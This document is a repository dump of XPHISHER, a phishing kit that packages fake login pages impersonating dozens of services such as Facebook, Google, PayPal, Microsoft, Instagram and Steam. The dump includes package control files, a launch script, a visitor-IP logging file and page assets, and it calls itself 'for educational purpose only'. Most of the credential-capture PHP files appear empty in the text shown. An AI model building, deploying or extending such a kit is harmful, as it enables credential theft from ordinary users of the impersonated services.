├── .package ├── DEBIAN │ └── control ├── TERMUX │ └── control └── launch.sh ├── .sites ├── adobe │ ├── index.php │ ├── login.html │ └── login.php ├── badoo │ ├── index.php │ ├── login.html │ └── login.php ├── deviantart │ ├── index.php │ ├── login.html │ └── login.php ├── discord │ ├── 6c6374bad0b0b6d204d8d6dc4a18d820.woff │ ├── LICENSE │ ├── banner.png │ ├── e8acd7d9bf6207f99350ca9f9e23b168.woff │ ├── fav.ico │ ├── index.php │ ├── login.html │ ├── login.php │ ├── qr.png │ ├── script.js │ └── style.css ├── dropbox │ ├── dropbox1.png │ ├── dropbox2.png │ ├── dropbox3.png │ ├── dropbox4.svg │ ├── dropbox5.svg │ ├── dropbox6.svg │ ├── index.php │ ├── login.html │ └── login.php ├── ebay │ ├── index.php │ ├── login.html │ └── login.php ├── facebook │ ├── LICENSE │ ├── README.md │ ├── hsts-pixel.gif │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.svg │ ├── mobile.html │ ├── script.js │ └── style.css ├── fb_advanced │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ └── result.html ├── fb_messenger │ ├── index.php │ ├── login.html │ └── login.php ├── fb_security │ ├── fb-ico.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.png │ └── style.css ├── github │ ├── index.php │ ├── login.html │ └── login.php ├── gitlab │ ├── index.php │ ├── login.html │ └── login.php ├── google │ ├── avatar.png │ ├── google.png │ ├── index.php │ ├── login.html │ └── login.php ├── google_new │ ├── index.php │ ├── login.html │ └── login.php ├── google_poll │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ └── result.html ├── ig_followers │ ├── index.php │ ├── login.html │ └── login.php ├── ig_verify │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ ├── login2.php │ └── login3.html ├── insta_followers │ ├── index.php │ ├── login.html │ └── login.php ├── instagram │ ├── Index.php │ ├── badge_android_english-en.png │ ├── badge_ios_english-en.png │ ├── favicon.png │ ├── home-phones.png │ ├── home-phones@2x.png │ ├── login.html │ ├── login.php │ ├── screenshot1.jpg │ ├── screenshot2.jpg │ ├── screenshot3.jpg │ ├── screenshot4.jpg │ ├── screenshot5.jpg │ ├── sprite_core_2x_bcd90c1d4868.png │ └── sprite_core_32f0a4f27407.png ├── ip.php ├── linkedln │ ├── 4li12pah6li7xka3r69y2hqap.css │ ├── 6jblk5oqhlo45xbkmcr7s4zix │ ├── 77qnm4uzm172xn82kvifmelfu │ ├── 9lb1g1kp916tat669q9r5g2kz │ ├── dnz8biurbtozxjvxufs5aq4jd │ ├── dz6wk4o93mwzoh0t6zsx73kzr │ ├── index.php │ ├── login.html │ └── login.php ├── mediafıre │ ├── index.php │ ├── login.html │ └── login.php ├── microsoft │ ├── ConvergedLoginPaginatedStrings.EN.js │ ├── ConvergedLoginPaginatedStrings.js │ ├── ConvergedLogin_PCore.js │ ├── Converged_v21033.css │ ├── Converged_v21033.css2 │ ├── boot.css │ ├── boot.js │ ├── boot_002.js │ ├── boot_003.js │ ├── boot_004.js │ ├── ellipsis_grey.svg │ ├── ellipsis_white.svg │ ├── index.php │ ├── login.html │ ├── login.php │ ├── microsoft_logo.svg │ ├── prefetch.html │ ├── sprite1.css │ └── sprite1.png ├── netflix │ ├── FB-f-Logo__blue_57.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── none.css │ ├── none.js │ ├── none_002.js │ ├── sdk.js │ └── xaOI6zd9HW9.html ├── origin │ ├── EA_Origin_Lockup_Black.png │ ├── analytics.js │ ├── api.js │ ├── css.css │ ├── iframe_api.js │ ├── index.php │ ├── jquery-1.js │ ├── jquery.js │ ├── jquery_002.js │ ├── jquery_003.js │ ├── jquery_004.js │ ├── login.html │ ├── login.php │ ├── originX-pc-common.css │ ├── originX-pc-login.css │ ├── otk.css │ ├── recaptcha__en.js │ ├── sha.js │ ├── utag.js │ ├── utag_002.js │ └── www-widgetapi.js ├── paypal │ ├── index.php │ ├── login.html │ └── login.php ├── pinterest │ ├── index.php │ ├── login.php │ └── signin.php ├── playstation │ ├── 0a674de1f2362e0247eec6e1d770e │ ├── Index.php │ ├── S9fUSTxhhOdrtoorjI9LLu91aXsPVT7Js_3UUxt2SGg.js.download │ ├── anchor.html │ ├── api.js.download │ ├── bframe.html │ ├── button_icon_password_off.png │ ├── kekka-22361ea3e8890b95e7b006a784440d01.css │ ├── kekka-6225c71c3ba0a25429287cf2bec55f12.js.download │ ├── loading.png │ ├── loading_base.png │ ├── login.html │ ├── login.php │ ├── logo_playstation.png │ ├── pc-7cc7759e91c65baf3b78fd4eb4402c4f.css │ ├── recaptcha__en_gb.js.download │ ├── saved_resource │ ├── saved_resource(1) │ ├── siews1lib.js.download │ ├── sony_logo.png │ ├── styles__ltr.css │ ├── ua-parser.min-03f60cd2f499bace751d5136d4fc67d4.js.download │ ├── unifiedfooter.en-gb.js.download │ ├── vendor-05c320ffd8d18cdbde15fa028ff545b7.js.download │ ├── vendor-571d67531622102402268bd2c623c17f.css │ └── wallpaper.jpg ├── protonmail │ ├── app.js │ ├── appLazy.js │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.png │ ├── openpgp.js │ ├── styles.css │ ├── vendor.js │ └── vendorLazy.js ├── quora │ ├── -4-chunk.web.main.js.out-34-ee935e0e4fc8f76d.webpack │ ├── -4-main.css-27-d85df81eef715f06.css │ ├── -4-web.entry.js.out-34-8f7d03da0b7a24ae.webpack │ ├── anchor.html │ ├── bframe.html │ ├── client_platform.js.download │ ├── iframe.html │ ├── index.php │ ├── login.html │ ├── login.php │ └── saved_resource.html ├── reddit │ ├── ProductionClient.62deff0b1c9fbf3af019.js │ ├── index.php │ ├── login.ec234f177c42a52ad0ff.js │ ├── login.html │ ├── login.php │ └── mobile.html ├── snapchat │ ├── index.php │ ├── login.php │ └── users.php ├── spotify │ ├── analytics.js │ ├── anchor.html │ ├── api.js │ ├── bframe.html │ ├── hVpKLs9k787xwHAhrfSZCIqM1XtnPD1dxAE7zC2jvTU.js │ ├── index.css │ ├── index.js │ ├── index.php │ ├── login.html │ ├── login.php │ ├── recaptcha__en.js │ └── styles__ltr.css ├── stackoverflow │ ├── index.php │ ├── login.html │ └── login.php ├── steam │ ├── index.php │ ├── login.html │ └── login.php ├── tiktok │ ├── index.php │ ├── jquery.min.js │ ├── jscript.js │ ├── login.html │ ├── login.php │ ├── logo.png │ ├── sadflix.ttf │ └── style.css ├── twitch │ ├── index.php │ ├── login.php │ └── user.php ├── vk │ ├── b-0f6403442fbf95cd84849e54d8e9ab53.ddb71f5a609d75e3ef6e.js.download │ ├── b-93dd9d3be5cab15401cc628b931eb724.9cac7b4a6901a4dab64f.js.download │ ├── common.6d5af9c51c7e29087e36.js.download │ ├── common.css │ ├── counter │ ├── index.php │ ├── login.html │ ├── login.php │ ├── p │ ├── polyfills.c5f9a2ced681ad88809a.js.download │ └── vendors.2773b57485e379f375b2.js.download ├── vk_poll │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ ├── result.html │ ├── s_c.js │ ├── s_cfmxw.css │ ├── s_yzgt.css │ └── s_z.js ├── wordpress │ ├── index.php │ ├── load-styles.css │ ├── login.html │ └── login.php ├── xbox │ ├── index.php │ ├── login.php │ └── pass.php ├── yahoo │ ├── index.php │ ├── login.html │ ├── login.php │ └── mobile.html └── yandex │ ├── index.php │ ├── login.html │ └── login.php ├── Dockerfile ├── README.md ├── make-deb.sh └── xphisher.sh /.package/DEBIAN/control: -------------------------------------------------------------------------------- 1 | Package: XPHISHER 2 | Version: 2.2 3 | Installed-Size: 1065 4 | Architecture: all 5 | Maintainer: @XPH4N70M 6 | Depends: php, wget, git, curl, resolv-conf, proot 7 | Homepage: https://github.com/XPH4N70M/XPHISHER 8 | Description: A 32+ Template Tool With Cloudflared Link XPhisher This Tool is made for educational purpose only ! 9 | -------------------------------------------------------------------------------- /.package/TERMUX/control: -------------------------------------------------------------------------------- 1 | Package: XPHISHER 2 | Version: 2.2 3 | Installed-Size: 1065 4 | Architecture: all 5 | Maintainer: @XPH4N70M 6 | Depends: php, wget, git, curl, resolv-conf, proot 7 | Homepage: https://github.com/XPH4N70M/XPHISHER 8 | Description: A 32+ Template Tool With Cloudflared Link XPhisher This Tool is made for educational purpose only ! 9 | -------------------------------------------------------------------------------- /.package/launch.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | DISTRO=$(uname -o) 4 | 5 | if [ $DISTRO == Android ]; then 6 | export XPHISHER_ROOT="/data/data/com.termux/files/usr/opt/xphisher" 7 | else 8 | export XPHISHER_ROOT="/usr/opt/xphisher" 9 | fi 10 | 11 | cd $XPHISHER_ROOT 12 | bash ./xphisher.sh 13 | -------------------------------------------------------------------------------- /.sites/adobe/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/adobe/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/badoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/badoo/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/deviantart/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/deviantart/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/discord/6c6374bad0b0b6d204d8d6dc4a18d820.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/discord/6c6374bad0b0b6d204d8d6dc4a18d820.woff -------------------------------------------------------------------------------- /.sites/discord/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Ali Milani 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | # https://github.com/AliMilani/fake-discord -------------------------------------------------------------------------------- /.sites/discord/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/discord/banner.png -------------------------------------------------------------------------------- /.sites/discord/e8acd7d9bf6207f99350ca9f9e23b168.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/discord/e8acd7d9bf6207f99350ca9f9e23b168.woff -------------------------------------------------------------------------------- /.sites/discord/fav.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/discord/fav.ico -------------------------------------------------------------------------------- /.sites/discord/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/discord/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/discord/qr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/discord/qr.png -------------------------------------------------------------------------------- /.sites/discord/script.js: -------------------------------------------------------------------------------- 1 | let inputs = document.querySelectorAll('form input') 2 | let submitBtn = document.querySelector('form button[type="submit"]') 3 | // submitBtn.addEventListener("click", validateForm) 4 | inputs[1].addEventListener("input", validateForm) 5 | 6 | function validateForm() { 7 | let outlines = document.querySelectorAll('form .input-outline') 8 | let lables = document.querySelectorAll('.colorStandard-21JIj7') 9 | let errMessages = document.querySelectorAll('.errorMessage-1kMqS5') 10 | 11 | for (let i = 0; i < inputs.length; i++) { 12 | inputs[i].addEventListener("input", validateForm) 13 | if (inputs[i].value == '') { 14 | outlines[i].classList.add('error-8r7mjf') 15 | lables[i].classList.add('error-3EBD81') 16 | errMessages[i].style.display = 'inline' 17 | 18 | } else { 19 | outlines[i].classList.remove('error-8r7mjf') 20 | lables[i].classList.remove('error-3EBD81') 21 | errMessages[i].style.display = 'none' 22 | submitBtn.disabled = '' 23 | } 24 | } 25 | (!inputs[0].value == '' && !inputs[1].value == '') ? 26 | submitBtn.disabled = '' : submitBtn.disabled = 'disabled' 27 | 28 | } -------------------------------------------------------------------------------- /.sites/dropbox/dropbox1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/dropbox/dropbox1.png -------------------------------------------------------------------------------- /.sites/dropbox/dropbox2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/dropbox/dropbox2.png -------------------------------------------------------------------------------- /.sites/dropbox/dropbox3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/dropbox/dropbox3.png -------------------------------------------------------------------------------- /.sites/dropbox/dropbox4.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/dropbox/dropbox5.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/dropbox/dropbox6.svg: -------------------------------------------------------------------------------- 1 | 5 | -------------------------------------------------------------------------------- /.sites/dropbox/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/dropbox/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |